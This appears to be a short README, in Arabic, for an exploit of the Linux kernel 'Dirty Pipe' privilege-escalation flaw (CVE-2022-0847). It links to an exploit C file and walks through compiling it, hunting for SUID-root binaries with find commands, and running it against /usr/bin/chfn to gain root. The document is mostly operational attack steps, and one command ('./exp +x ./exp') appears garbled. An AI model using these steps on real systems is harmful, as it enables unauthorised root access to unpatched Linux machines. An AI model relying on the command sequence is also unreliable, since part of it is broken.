
CVE-2022-0847-DirtyPipe-Exploit
في 7 مارس، نشر الباحث الأمني الأجنبي ماكس كيلرمان مدونة كشف فيها عن ثغرة رفع صلاحيات محلية موجودة في نواة لينكس CVE-2022-0847: https://dirtypipe.cm4all.com/
CVE-2022-0847 هي ثغرة رفع صلاحيات محلية موجودة في نواة لينكس 5.8 والإصدارات الأحدث. باستغلال هذه الثغرة، يمكن للمهاجم الكتابة فوق البيانات في أي ملف قابل للقراءة، وبالتالي رفع صلاحيات المستخدم العادي إلى صلاحيات الجذر (root).
مبدأ ثغرة CVE-2022-0847 مشابه لثغرة CVE-2016-5195 (Dirty Cow)، لكنها أسهل في الاستغلال. أطلق عليها مؤلف الثغرة اسم "Dirty Pipe".
الرابط: https://haxx.in/files/dirtypipez.c
المؤلف: Max Kellermann [email protected]
gcc -o exp exploit.c
./exp +x ./exp
# 查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
./exp /usr/bin/chfn
